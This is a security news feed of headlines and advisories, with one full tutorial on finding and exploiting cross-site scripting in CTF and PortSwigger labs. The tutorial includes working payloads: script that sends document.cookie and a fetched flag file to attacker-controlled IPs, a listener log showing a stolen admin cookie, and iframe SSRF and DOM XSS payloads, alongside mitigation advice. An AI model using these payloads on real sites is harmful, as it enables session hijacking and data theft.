How scammers are tricking Apple iMessage users into disabling phishing protectionPeople who unwittingly follow the instructions in certain malicious text messages end up bypassing Apple's phishing protection.
by ZDNET Security
2025-01-15 09:50:16
UN Security Council members meet on spyware for first timeOn January 14, 2025, the United Nations Security Council convened an informal meeting to address the escalating threat posed by commercial spyware. The post UN Security Council members meet on spyware for first time appeared first on ZENDATA Cybersecurity.
by Zendata
2025-01-15 09:00:00
Biggest Patch Tuesday in years sees Microsoft address 159 vulnerabilities
by ComputerWeekly
2025-01-15 09:00:00
5 Things Government Agencies Need to Know About Zero Trust
Zero trust as a concept is simple to grasp. Implementing a zero trust architecture, on the other hand, is complex because it involves addressing a unique mix of process, procedure, technology and user education. Here are some considerations to keep in mind as you begin your journey.

Draft guidance on implementing a zero trust architecture, released by the National Institute of Standards and Technology (NIST) on Dec. 4, 2024, gives government agencies and private sector organizations a solid blueprint to follow. There are a number of additional considerations to keep in mind as you begin your journey.

First and foremost, zero trust is an alternative way of thinking about information security that treats trust as a vulnerability. It removes trust entirely from digital systems and is built upon the idea that security must become ubiquitous throughout the infrastructure. The concepts of zero trust are simple:
- All resources are accessed in a secure manner, regardless of location.
- Access control is on a "need-to-know" basis and is strictly enforced.
- All traffic is inspected and logged.
- The network is designed from the inside out.
- The network is designed to verify everything and trust nothing.

A zero trust architecture can be implemented using commercial off-the-shelf technology. It's built upon current cybersecurity best practices and dovetails with a robust exposure management program. In fact, exposure management and zero trust go hand-in-hand.

5 things to keep in mind about zero trust
Here are five considerations as you begin your zero trust journey:
1. Zero trust is a strategy, not a SKU. In most organizations, it can be implemented using existing off-the-shelf cybersecurity products. There is no single zero trust product your organization can purchase and plug in to transform your risk posture overnight.
2. Zero trust requires a foundation of strong exposure management. As the National Institute of Standards and Technology (NIST) guidelines make clear, you can't build a zero trust strategy without first having accurate visibility into all of the organization's assets — including IT, cloud, operational technology (OT) and internet of things (IoT). An exposure management program can provide you with that level of visibility as well as the ability to act on findings in real time.
3. User profiles matter more than ever. A zero trust strategy requires you to continuously monitor all users all the time. Identity and access management capabilities such as Entra ID and Active Directory, which are used to manage user profiles and privileges, must be continuously monitored and kept up to date.
4. No one is trusted — no exceptions. This may not please senior leaders, who can sometimes behave as if the rules don't apply to them. Brushing up on your diplomatic skills is advised. Ultimately, though, a zero trust architecture can be implemented without creating significant friction for end users.
5. Zero trust requires thoughtful communication. There are people throughout the organization who have built their careers on the legacy cybersecurity principles of moat-and-castle and trust-but-verify. They may be threatened or feel that their jobs are in jeopardy if they aren't engaged in the zero trust buildout from day one.

Zero trust as a concept is simple to grasp. What makes zero trust complex to implement are the same factors that make any cybersecurity strategy complex: the unique mix of processes, procedures and technology found in your IT infrastructure, as well as the need for significant user education. It's best to start small and roll out from there, rather than trying to boil the ocean.

For cybersecurity leaders in government agencies, preparing for a zero trust architecture is less an exercise in evaluating technologies and more an exercise in strategic thinking, requiring you to answer fundamental questions such as:
- What is your agency’s core mission or value proposition?
- What are the workflows required to fulfill that mission?
- Who owns those workflows?
- How does data flow in the organization?
- Which are your high-value assets, the so-called "keys to the kingdom"?
- How does the organization determine who is granted access to these high-value assets?
- How often does the organization audit user permissions once they are set?
- What building blocks do you already have in place to support a zero trust strategy?

Answering these questions requires full visibility and continuous monitoring of your entire attack surface, including IT, internet of things (IoT) and operational technology (OT) assets, and the ability to assess the criticality of each asset to deliver on your organization's core mission. No zero trust journey can begin without first addressing these fundamentals of exposure management.

How zero trust and exposure management go hand-in-hand
Exposure management transcends the limitations of siloed security programs. Built on the foundations of risk-based vulnerability management, exposure management takes a broader view across your modern attack surface, applying both technical and business context to more precisely identify and more accurately communicate cyber risk, enabling better business outcomes. An exposure management program combines technologies such as vulnerability management, web application security, cloud security, identity security, attack path analysis and patch management to help an organization understand the full breadth and depth of its exposures and take the actions needed to reduce them through remediation and incident response workflows. Exposure management gives security teams a full, dynamic and accurate picture of the attack surface at any point in time, aiding in the implementation of zero trust policies and architecture.

Learn more
- Download the Gartner report "How to Grow Vulnerability Management into Exposure Management"
- Read the blogs "Tenable and the Path to Zero Trust" and "Making Zero Trust Architecture Achievable"
- View the updated draft "Guidance for Implementing a Zero Trust Architecture", released by NIST on Dec. 4, 2024
by Tenable
2025-01-15 08:34:00
World Economic Forum spotlights growing gap in cyber readinessRansomware remains the top cyber risk concern among executives, but CISOs are almost twice as likely as CEOs to make that determination.
by Cybersecurity Dive
2025-01-15 05:00:50
Ransomware and Cyber Extortion in Q4 2024December 2024 marked the highest number of victims recorded in a single month. A key factor is likely the growth of the ransomware ecosystem itself.
by ReliaQuest
2025-01-15 05:00:00
Davos 2025: Misinformation and disinformation are most pressing risks, says World Economic Forum
by ComputerWeekly
2025-01-15 03:09:41
159-CVE January Patch Tuesday smashes single-month recordBrace yourselves... and consider reading your email in plaintext for now
by Sophos News
2025-01-15 02:00:00
As Tensions Mount With China, Taiwan Sees Surge in CyberattacksIn 2024, the Taiwanese government saw the daily average of attempted attacks by China double to 2.4 million, with a focus on government targets and telecommunications firms.
by Dark Reading
2025-01-15 00:00:00
CrowdStrike Falcon for Legacy Systems: Modern Security for Legacy Environments
by CrowdStrike
2025-01-15 00:00:00
CrowdStrike Insider Risk Services Defend Against the Threats Within
by CrowdStrike
2025-01-15 00:00:00
BFI’s Journey in Digital Transformation: A Fireside Chat on Elevating Application Security and Developer ExperienceDiscover how BFI Finance Indonesia transformed their SDLC with proactive security practices, improving compliance, developer experience, and collaboration. Learn key insights from their journey shared at CISO Indonesia 2024, moderated by Snyk's Didik Achmadi.
by Snyk
2025-01-15 00:00:00
ZDI-25-030: Microsoft Office Word DOCX File Parsing Uninitialized Pointer Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Office Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-21363.
by Zero Day Initiative Advisories
2025-01-15 00:00:00
ZDI-25-029: Microsoft Windows Installer Service Link Following Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-21331.
by Zero Day Initiative Advisories
2025-01-15 00:00:00
ZDI-25-028: Microsoft Office Word RTF File Parsing Memory Corruption Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Office Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-21298.
by Zero Day Initiative Advisories
2025-01-14 22:56:16
Microsoft Rings in 2025 With Record Security UpdateCompany has issued patches for an unprecedented 159 CVEs, including eight zero-days, three of which attackers are already exploiting.
by Dark Reading
2025-01-14 22:50:00
Microsoft: Happy 2025. Here’s 161 Security UpdatesMicrosoft today unleashed updates to plug a whopping 161 security vulnerabilities in Windows and related software, including three "zero-day" weaknesses that are already under active attack. Redmond's inaugural Patch Tuesday of 2025 bundles more fixes than the company has shipped in one go since 2017.
by Krebs on Security
2025-01-14 22:23:00
Microsoft Uncovers macOS Vulnerability CVE-2024-44243 Allowing Rootkit InstallationMicrosoft has shed light on a now-patched security flaw impacting Apple macOS that, if successfully exploited, could have allowed an attacker running as "root" to bypass the operating system's System Integrity Protection (SIP) and install malicious kernel drivers by loading third-party kernel extensions. The vulnerability in question is CVE-2024-44243 (CVSS score: 5.5), a medium-severity bug
by The Hacker News
2025-01-14 22:08:00
Google OAuth Vulnerability Exposes Millions via Failed Startup DomainsNew research has pulled back the curtain on a "deficiency" in Google's "Sign in with Google" authentication flow that exploits a quirk in domain ownership to gain access to sensitive data. "Google's OAuth login doesn't protect against someone purchasing a failed startup's domain and using it to re-create email accounts for former employees," Truffle Security co-founder and CEO Dylan Ayrey said
by The Hacker News
2025-01-14 21:52:52
1Password's Trelica Buy Part of Broader Shadow IT PlayThe acquisition accelerates 1Password's ongoing efforts to expand the role of the password manager with secure SaaS management.
by Dark Reading
2025-01-14 21:45:43
Apple Bug Allows Root Protections Bypass Without Physical AccessEmergent macOS vulnerability lets adversaries circumvent Apple's System Integrity Protection (SIP) by loading third-party kernels.
by Dark Reading
2025-01-14 21:25:43
Hackers are exploiting a new Fortinet firewall bug to breach company networksSecurity researchers say "tens" of Fortinet devices have been compromised so far as part of the weeks-long hacking campaign.
by TechCrunch
2025-01-14 21:24:34
FBI Wraps Up Eradication Effort of Chinese 'PlugX' MalwareTwo hacker groups were paid to develop malware targeting victims in the US, Europe, and Asia, as well as various Chinese dissident groups.
by Dark Reading
2025-01-14 21:15:12
Microsoft Patch Tuesday for January 2025 — Snort rules and prominent vulnerabilitiesMicrosoft has released its monthly security update for January of 2025 which includes 159 vulnerabilities, including 10 that Microsoft marked as “critical.” The remaining vulnerabilities listed are classified as “important.”
by Cisco Talos Blog
2025-01-14 20:46:00
Insurer solves web proxy service availability and performance woesGet all the details about how Uniqa Group AG was able to optimize employee productivity, improve employees’ daily experience, and boost overall security in this case study blog.
by Barracuda
2025-01-14 20:35:30
How to Prevent Risk From Unknown Build AssetsFind out why unknown build assets is a growing problem and how Legit can help.
by Legit Security
2025-01-14 19:27:23
Detecting and Mitigating Adversary-in-the-Middle Phishing Attacks with Darktrace ServicesThreat actors often use advanced phishing toolkits and Adversary-in-the-Middle (AitM) attacks in Business Email Compromise (BEC) campaigns. Discover how Darktrace detected and mitigated a sophisticated attack leveraging Dropbox, highlighting the importance of robust cybersecurity measures.
by Darktrace
2025-01-14 19:17:20
Finding and Exploiting XSS in Web Applications (Step-by-Step)

What is XSS?

A common client-side vulnerability we often see is Cross-Site Scripting (XSS), where we allow an attacker to insert a malicious script into our web pages, targeting the users of the affected pages. These scripts run in the victim's browser and can then steal sensitive information such as cookies or session tokens, or perform unauthorised actions as the user. XSS is caused by a failure to validate or sanitise user input, which makes it a devastating threat to web applications.

Types of XSS

There are several types of XSS, each with distinct behaviour: Stored, Reflected, DOM-based, and a less well-known variant, Blind XSS.

Stored XSS: Persistent XSS (also known as stored XSS) occurs when the malicious payload is saved on the server (usually in a database) and delivered to users whenever they access the affected page. It is especially dangerous because the script runs every time the page is viewed, usually without any interaction from the victim.

Reflected XSS: When an attacker includes a malicious script in a URL parameter and that parameter is reflected back into the user's browser without being sanitised, that is reflected XSS. The attack relies on social engineering: the attacker has to trick the victim into clicking a crafted link to launch it.

DOM-based XSS: In DOM-based XSS the malicious payload never reaches the server. The vulnerability lies in the JavaScript the browser executes: unsanitised user input is used to modify the Document Object Model (DOM) dynamically, leading to script execution.

Blind XSS: Blind XSS is a special type of stored XSS in which the attacker's payload is stored on the server, but its result is only visible to an internal user (for example, an admin) who later views the page that runs the script. The attacker does not immediately see the result of execution, so they rely on tools that notify them when the payload triggers.

This form of XSS is particularly useful where admin panels or internal dashboards are not exposed to the attacker in the first place. Note that in all types of XSS the payload might be the same; what differs is how the payload is processed. If the input is saved server-side, it is Stored XSS. If it is immediately reflected back by the server, it is Reflected XSS. If the input is processed and executed within the browser's DOM without server interaction, it is DOM-based XSS. Blind XSS: the payload triggers in a different application or context (such as an admin panel) where the attacker does not see the immediate result; it often requires waiting for a privileged user to interact with the injected payload.

Understanding Tags, Events, and Fuzzing Methodology in XSS Testing

Cross-Site Scripting (XSS) vulnerabilities are present when user input is not sanitised properly, giving the attacker a chance to inject malicious scripts into a web page. A good way to identify these vulnerabilities is to learn how HTML tags are structured, how events work, and how to fuzz the point of injection. The methodology is really simple: a pentester generally tests a set of HTML tags in various HTTP headers and user input fields to see whether they are reflected on the web page. Read that previous line a couple of times until it sinks in and the methodology is clear. Sometimes tags are blacklisted, and to trigger a payload we may need to include events along with the tags so that some JavaScript alert fires. So we start by fuzzing for allowed tags and events on the web application or page; this is a great way to start testing for XSS. Some of you might now be thinking: what if the application blacklists or filters angle brackets? In that case we may need to encode them, for example with HTML encoding. Don't worry, in the upcoming sections we will see how to test for XSS in great detail.

You might want to bookmark the following websites for future reference on evading web application defences to execute our JavaScript:
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

In the third paragraph we mentioned tags and events; let's talk about these topics in detail.

What Are Tags and Events in XSS?

Tags: HTML tags are the basic building blocks of web pages. They define the structure and content of a page: what it will contain, such as text, images and links. Tags are enclosed within angle brackets (< >), for example:
<b>: makes text bold.
<script>: embeds JavaScript code.
<img>: displays an image.
Tags matter in the context of XSS because injecting new tags into a page can change its structure and behaviour. For example, we can add a <script> tag that executes JavaScript code on the target page.

Events: In HTML, events (also known as browser-triggered or user-interaction events) are things a web page can respond to. Event attributes start with "on" and are attached to HTML elements to trigger JavaScript functions, such as:
onclick: called when an element is clicked.
onmouseover: called when the mouse hovers over an element.
onload: runs when an image or page finishes loading.
XSS attacks are commonly delivered via event handlers because they allow execution of JavaScript without introducing new tags. For instance:
<img src="example.jpg" onerror="alert('XSS')">
Here, the onerror event executes an alert when the image fails to load.

Methodology for Finding XSS by Fuzzing Tags and Events

When testing for XSS vulnerabilities you should approach them systematically: fuzz different tags and event handlers and observe how the application reacts to them.

Here's a step-by-step methodology:

Step 1: Basic Tags for Non-Intrusive Testing
First, check whether the application accepts HTML tags without encoding them. To check whether your input is rendered as HTML, use something simple such as a <b> tag. Example:
<b>This is a test for XSS</b>
If the text appears bold on the web page, the application is likely not encoding special characters such as < and >, and that is a good starting point. Use the PortSwigger XSS cheat sheet (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) to fuzz for input.

Step 2: Testing Common Event Handlers
Next, try adding event handlers to HTML elements. For example:
<img src="x" onerror="alert('XSS')">
If an alert box appears, the application is vulnerable to event-based XSS. Now we can use the same cheat sheet to fuzz events.

Step 3: Fuzzing with Various Tags and Events, and Generating Your Own Payloads
Use the lists of tags and events from resources like OWASP's XSS Filter Evasion Cheat Sheet or PortSwigger's XSS cheat sheet. Test different combinations of:
Tags: <script>, <img>, <iframe>, etc.
Events: for example onclick, onmouseover, onload, etc.
If you know some JavaScript you can create payloads yourself from the tags and events the application accepts; otherwise, search for payloads or use your favourite AI tool (ChatGPT, Claude, etc.) to build payloads from the tags and events the web application is consuming.

Step 4: Analysing the Response
When you inject a payload, analyse how the application processes it. It is very important to make sure the payload works as intended and to check whether it is stored or reflected XSS: it is stored XSS if the payload persists on the website and fires each time you visit the same page, and reflected XSS if it does not.
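The defensive counterpart of the tag and event fuzzing above is context-aware output encoding: if the application encodes user data for the context it lands in, the <b> probe renders as literal text and the onerror probe never becomes an event handler. The following is an added example written for this edit, not code from the original post; it implements the OWASP Cross Site Scripting Prevention Cheat Sheet rules for the HTML body, HTML attribute and JavaScript string contexts, and checks the page's own probes against an encoded and an unencoded template. The template fragments and the probe list are constructed for the demonstration.

```javascript
// Added example (not from the original post): context-aware output encoders
// and a self-check that runs the probes from the methodology above through
// an encoded template and a naive concatenation.

// Rule 1: HTML body context. Entity-encode the characters that can open or
// close markup.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Rule 2: HTML attribute context. Encode everything except alphanumerics as
// &#xHH; so a value cannot close the attribute or the tag, even when the
// attribute is unquoted.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '&#x' + c.charCodeAt(0).toString(16).toUpperCase() + ';');
}

// Rule 3: JavaScript string context. \xHH / \uHHHH-escape everything except
// alphanumerics so a quote or "</script>" cannot end the string or block.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Constructed template: the same untrusted search term placed in three
// contexts, each with the matching encoder.
function renderSearchResult(term) {
  return [
    '<p>Results for: ' + encodeForHtml(term) + '</p>',
    '<input name="q" value="' + encodeForHtmlAttribute(term) + '">',
    '<script>var q = "' + encodeForJsString(term) + '";</script>',
  ].join('\n');
}

// The vulnerable counterpart: raw concatenation into the HTML body, which is
// what makes the <b> probe render bold.
function renderSearchResultUnsafe(term) {
  return '<p>Results for: ' + term + '</p>';
}

// Count start tags and, inside those tags only, on*= event attributes.
function countTagsAndHandlers(html) {
  const tags = html.match(/<[a-zA-Z][^>]*>/g) || [];
  const handlers = tags.reduce(
    (n, tag) => n + (tag.match(/\son[a-z]+\s*=/gi) || []).length, 0);
  return { tags: tags.length, handlers };
}

// True when rendering the term changed the set of tags or handlers relative
// to the same template rendered with an empty term.
function introducesMarkup(rendered, template) {
  const r = countTagsAndHandlers(rendered);
  const t = countTagsAndHandlers(template);
  return r.tags !== t.tags || r.handlers !== t.handlers;
}

// Probes taken from the methodology above (constructed test inputs).
const PROBES = [
  '<b>This is a test for XSS</b>',
  '<img src="example.jpg" onerror="alert(\'XSS\')">',
  '"><svg onload=alert(1)>',
  '";alert(1);//',
];

// Run every probe through both templates and report which one leaks markup.
function auditProbes() {
  const safeTpl = renderSearchResult('');
  const unsafeTpl = renderSearchResultUnsafe('');
  return PROBES.map((p) => ({
    probe: p,
    encodedLeaks: introducesMarkup(renderSearchResult(p), safeTpl),
    unsafeLeaks: introducesMarkup(renderSearchResultUnsafe(p), unsafeTpl),
  }));
}
```

Call auditProbes() to see, per probe, that the encoded template never gains a tag or handler while the concatenating one does; in production use a maintained library rather than hand-rolled encoders, and keep the rule that the encoder must match the output context.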
Reference: DO NOT USE alert(1) for XSS

Finally, it is time to look at the next XSS mistake: alert(1) is outdated and meaningless without context. In a modern application the payload may be sandboxed so that it has little impact. Instead, use functions like alert(document.domain), console.log(window.origin), or fetch('https://yourserver.com/?c=' + document.cookie) (replacing yourserver.com with a server you control) to understand the vulnerability's scope. For DOM-based XSS, test whether your script can manipulate or extract sensitive data through window.location, localStorage or document.body.innerHTML. It is not just about triggering a popup: proving an XSS vulnerability requires showing the real security impact, such as stealing session cookies, reaching restricted domains, or modifying the page itself.

Some XSS testing methodologies and payloads that I got to learn from CTFs

1. Stealing cookies with XSS

I came across this technique while doing a retired HackTheBox machine called Headless, in which we steal the admin cookie. If we try to inject JavaScript code into any of the input fields it gets blacklisted, but if we inject XSS via HTTP headers we are able to trigger it. We will be using the following payload to trigger the XSS. Make sure to replace the IP in this script with your own, which you can find using the ifconfig command on Linux.
<script>var i=new Image(); i.src="http://10.10.14.6/?c="+document.cookie;</script>
Before you send this payload to the web application, make sure your local Python server is listening on the desired port so that we get the connection back:
python -m http.server 80
Now we get the admin user's cookie, which we can use to steal the session.

HTTP/1.1" 200 -
10.10.11.8 - - [11/Jul/2024 14:57:33] "GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 200 -
10.10.11.8 - - [11/Jul/2024 14:57:35] "GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 200 -

2. Blind XSS, or Using XSS to Fetch Files

Approach 1: We can use a Python script created by Tyler Ramsbey to fetch a file from a remote website that is vulnerable to XSS. You can get the Python script from here. Download and save it, then use the following command to create a malicious script.js which we will use against the web server:
sudo python3 xss-extract.py -d /flag.txt -i 10.17.26.83:8000
Make sure that you enter your TryHackMe IP address; here I have used mine. Before you send this payload, we make the server call back to us so that we can see its response. Note that, unlike reflected XSS, we won't be able to see any response directly, but if we set up a Python server or netcat listener we should be able to get the response. So let's do that:
sudo python3 -m http.server
Now use the following payload in the feedback section and check your Python server; if you have done everything correctly, you should get the /flag.txt file from the website.

/home/mccleod/tools via 🐍 v3.8.10 took 1m42s
❯ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.53.74 - - [14/Jan/2025 00:05:08] "GET /?c=THM{83789a69074f636f64a38879cfcabe8b62305ee6} HTTP/1.1" 200 -
10.10.53.74 - - [14/Jan/2025 00:05:08] "GET /?c=TypeError:%20Failed%20to%20fetch HTTP/1.1" 200 -
10.10.53.74 - - [14/Jan/2025 00:05:18] "GET /?c=THM{83789a69074f636f64a38879cfcabe8b62305ee6} HTTP/1.1" 200 -
10.10.53.74 - - [14/Jan/2025 00:05:19] "GET /?c=TypeError:%20Failed%20to%20fetch HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

Approach 2: We can use an img-tag payload to exfiltrate or steal the file from the website.
Payload:
<img src="x" onerror="fetch('http://127.0.0.1:8080/flag.txt').then(r => r.text()).then(r => fetch('http://10.17.123.199:8080/?c=' + r)).catch(e => fetch('http://10.17.123.199:8080/?c=' + e))"/>
Make sure you are running your Python server in the background and you should get the flag.
Explanation: The payload first attempts to fetch the contents of http://127.0.0.1:8080/flag.txt, where the flag is likely stored. It then sends the contents (or any error) to the attacker's server at http://10.11.116.53:8080, appending the response as a query parameter (?c=<response>). This ensures that, if the fetch request is successful, the contents of the flag.txt file are exfiltrated to our server. After submitting this payload, monitor your listener server for any incoming connections containing the flag.
Credits - Jay Batt
If you are interested in setting up your own server to test real-world websites for blind XSS, then I highly recommend reading this blog by Intigriti.

3. XSS to SSRF

This is very simple yet effective: we can use an iframe, which embeds another HTML document within a parent page. With this we can try to access internal website pages, and it works. A good friend of mine, goodfella, made a detailed write-up in which this payload is used to solve the room and get the flag; if you are interested in this room, check it out here.
Payload:
<iframe src="http://localhost:5000/admin"></iframe>

4. DOM XSS

Link to the lab: https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink
This lab shows a DOM-based Cross-Site Scripting (DOM XSS) vulnerability in a web application that incorporates user input from the URL query parameter (location.search) via the document.write sink. An attacker can get the victim to load a URL containing a malicious payload, running arbitrary JavaScript inside the victim's browser.

In this lab, we successfully exploited the vulnerability using the payload:
"><svg onload=alert(1)>

What is DOM XSS?

DOM XSS occurs when JavaScript within the browser parses and executes malicious user input without communicating with the server. Unlike reflected or stored XSS, DOM XSS is the result of client-side manipulation of the DOM (Document Object Model). In particular, user-controlled data flows from a source (e.g. window.location, document.cookie) to a sink (e.g. innerHTML, document.write) in a dangerous way. To understand DOM-based XSS, it is crucial to grasp a few core concepts:
Source: the origin of untrusted input in client-side code, such as window.location, document.cookie or localStorage.
Sink: where the JavaScript code is executed; if the input is not sanitised, it can lead to XSS. Some of the vulnerable JS functions are innerHTML, eval() and document.write().
DOM: the programming interface to HTML and XML documents. It is the structure of a web page that scripts can use to update content and structure live.
Key Features of DOM XSS:
Client-Side Execution: the browser does all of the payload processing.
No Server-Side Reflection: the server does not send the malicious input in its response.
Sources and Sinks: unsafe sources (user-controlled inputs) and sinks (functions or methods that modify the DOM) cause the vulnerabilities.

Approach 1: Manual Method

Identifying Source and Sink
Source: The source in this lab is location.search, which represents the query string from the URL.
var query = (new URLSearchParams(window.location.search)).get('search');
This code snippet takes user input directly from the search parameter in the URL query string.
Sink: The sink in our lab is document.write, which writes HTML directly to the DOM. This sink is used in the following function:
function trackSearch(query) {
    document.write('<img src="/resources/images/tracker.gif?searchTerms=' + query + '">');
}
The unsanitised user input (query) is concatenated into the HTML and written into the DOM, creating a vulnerable injection point.

Steps to Identify and Exploit DOM XSS

We can identify DOM XSS by reading the client-side code of the web app, or by using the browser developer tools (in Chrome or another browser). At first glance we get a look at the JavaScript code.
1. Identify the Source: use the browser developer tools to inspect the JavaScript code. Look for user-controlled inputs like window.location, document.cookie, or localStorage.
2. Trace the Data Flow: follow how data moves from the source to the sink. Tools like the "Sources" tab in Chrome DevTools or Burp Suite can help trace the execution flow.
3. Find the Sink: look for functions like document.write, innerHTML, eval, or setTimeout. Verify whether user input is concatenated or directly injected into these methods.
4. Craft a Payload: use a payload specific to the context (e.g. breaking out of quotes or tags). Test with harmless payloads like <svg onload=alert(1)> to confirm the vulnerability.
Feel free to explore the many other labs on reflected, stored and DOM XSS on PortSwigger.

Exploiting DOM XSS

To exploit this vulnerability, our goal is to inject malicious content into the query parameter and have it executed by the document.write sink.
Injection Context: analyse where the input is injected into the DOM. Here, it is injected into the src attribute of an image tag (<img>).
Breaking the Context: use a payload that escapes the current HTML attribute and introduces new content. For this lab, the working payload is:
?search="><svg onload=alert(1)>
">: breaks out of the src attribute and closes the <img> tag.
<svg onload=alert(1)>: injects a new <svg> tag with an onload event that executes JavaScript.
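The fix for this source-to-sink flow is to keep the untrusted query out of HTML entirely: percent-encode it as a URL parameter and create the element through DOM APIs instead of document.write. The block below is an added example for this edit, not the lab's code; it places the lab's vulnerable trackSearch beside a hardened version. The base origin https://app.example used to construct the URL object and the makeFakeDocument stand-in (so the safe path can be exercised outside a browser) are assumptions made for the demonstration.

```javascript
// Added example (not the lab's code): the document.write sink beside a
// hardened version that never concatenates the query into HTML.

// Source: the same source the lab uses, taken as a parameter so it can be
// exercised with a constructed query string instead of window.location.
function getSearchTerm(locationSearch) {
  return new URLSearchParams(locationSearch).get('search');
}

// Vulnerable form (as in the lab): the raw query is concatenated into an
// HTML string destined for document.write. Returned as a string here so the
// result can be inspected without a browser.
function trackSearchVulnerable(query) {
  return '<img src="/resources/images/tracker.gif?searchTerms=' + query + '">';
}

// Hardened form, step 1: build the tracker URL with the URL API so the query
// is percent-encoded as a parameter value. The origin is only needed to
// construct the URL object (assumption) and is stripped again on return.
function trackerUrl(query) {
  const u = new URL('/resources/images/tracker.gif', 'https://app.example');
  u.searchParams.set('searchTerms', query);
  return u.pathname + u.search;
}

// Hardened form, step 2: create the element through DOM APIs instead of
// document.write. `doc` is the browser's `document`; it is injected so the
// function can run against the stand-in below.
function trackSearchSafe(query, doc) {
  const img = doc.createElement('img');
  img.setAttribute('src', trackerUrl(query));
  doc.body.appendChild(img);
  return img;
}

// Minimal stand-in for the parts of `document` used above (constructed for
// the offline demo; in a browser pass the real `document`).
function makeFakeDocument() {
  const body = {
    children: [],
    appendChild(el) { this.children.push(el); return el; },
  };
  return {
    body,
    createElement(tagName) {
      const attrs = {};
      return {
        tagName,
        setAttribute(k, v) { attrs[k] = String(v); },
        getAttribute(k) { return attrs[k]; },
      };
    },
  };
}

// Compare both sinks for one query string: does the rendered HTML of the
// vulnerable path contain the lab's <svg> breakout, and does the hardened
// path keep the term as a single, round-trippable parameter value?
function compareSinks(locationSearch) {
  const term = getSearchTerm(locationSearch);
  const url = trackerUrl(term);
  const roundTrip = new URLSearchParams(url.split('?')[1]).get('searchTerms');
  return {
    term,
    vulnerableBreaksOut: trackSearchVulnerable(term).includes('<svg'),
    safeUrl: url,
    safeRoundTrips: roundTrip === term,
  };
}
```

In the browser the call would be trackSearchSafe(getSearchTerm(window.location.search), document); the attribute value is always a single percent-encoded parameter, so no characters that could close the attribute or the tag ever reach the DOM.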
Full Exploit URL:
http://example.com/?search="><svg onload=alert(1)>
When this payload is processed, the resulting DOM contains the injected <svg> tag, which executes the JavaScript, triggering alert(1).

Approach 2: Using DOM Invader

DOM Invader is a Chromium browser extension developed by PortSwigger to find XSS vulnerabilities inside the DOM of a web application.
Setting Up DOM Invader
Enable DOM Invader in Burp Suite: go to the "Extensions" tab in Burp Suite and ensure that DOM Invader is enabled.
Activate DOM Invader: in the browser, you will see a DOM Invader widget on supported pages. In this case you may not need to turn on postMessage interception.
Now access the lab, right-click, choose Inspect and open the DOM Invader section. There you will get a value to check; first copy the query and paste it into the search box. As soon as you paste it, you will get a pop-up from DOM Invader saying it found an exploit, and if we click Exploit it opens a new tab which solves the lab for us. Now we have exploited DOM XSS using DOM Invader and solved the lab.

XSS Mitigation

Cross-Site Scripting (XSS) vulnerabilities arise when untrusted user input is rendered by the browser and fires malicious code. There are three common types: input reflected back from the server immediately (reflected XSS), user input stored and later displayed to other users (stored XSS), and input that requires no server interaction and executes entirely within the browser DOM (DOM-based XSS). Mitigating XSS involves a combination of secure coding practices and browser-level defences:
1. Sanitisation: all user data is sanitised, filtered and encoded to prevent malicious code execution.
2. HttpOnly Cookies: to reduce the chance of theft via XSS, mark your cookies as HttpOnly.
3. CSP (Content Security Policy): CSP constrains which scripts the browser is able to run (thus restricting XSS attack vectors).
4. Security Headers: browsers won't execute untrusted code if you set headers such as X-XSS-Protection and X-Content-Type-Options.
Obviously, when you are writing the pentest report you can't just brush over the surface and move on; you need to dive into the technical part and provide technical remediation. In such situations knowing a bit of JavaScript can be a lot of help, and as always you can refer to the OWASP XSS mitigation cheat sheet.

A note to remember

Finally, always remember: XSS without a strong impact is just another feature, not a bug! From the developer's point of view it might be just a web application feature where you performed some cool trick like an alert; unless you demonstrate a strong impact, your finding will not be classified as a bug. The struggle does not end there: if you can inject XSS into an input field, that is just another self-XSS. You must be able to deliver it to a client via something like a URL, and you can use some JavaScript to chain it from self-XSS into something more meaningful and impactful. The learning does not stop here, and it takes a lot of struggle and pain to produce a high-priority XSS bug. Finally, I leave you with some more blogs to understand and explore XSS.

Some blogs on XSS to improve understanding:
Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
by HACKLIDO
2025-01-14 19:03:07
How to Get Better Data Insights with AI-Driven SQLThe integration of AI with SQL is transforming data management, providing deeper insights, automating more mundane tasks, and improving user experiences.
by ITPro Today
2025-01-14 19:01:51
CVE-2024-55591: Fortinet FortiOS/FortiProxy Zero DayIn late November and December 2024, Arctic Wolf observed evidence of a mass compromise of Fortinet FortiGate. While the initial attack vector was unknown at the time, evidence of compromise (with new users and SSL profiles) was consistent across compromised devices.
by SpiderLabs Blog
2025-01-14 18:39:31
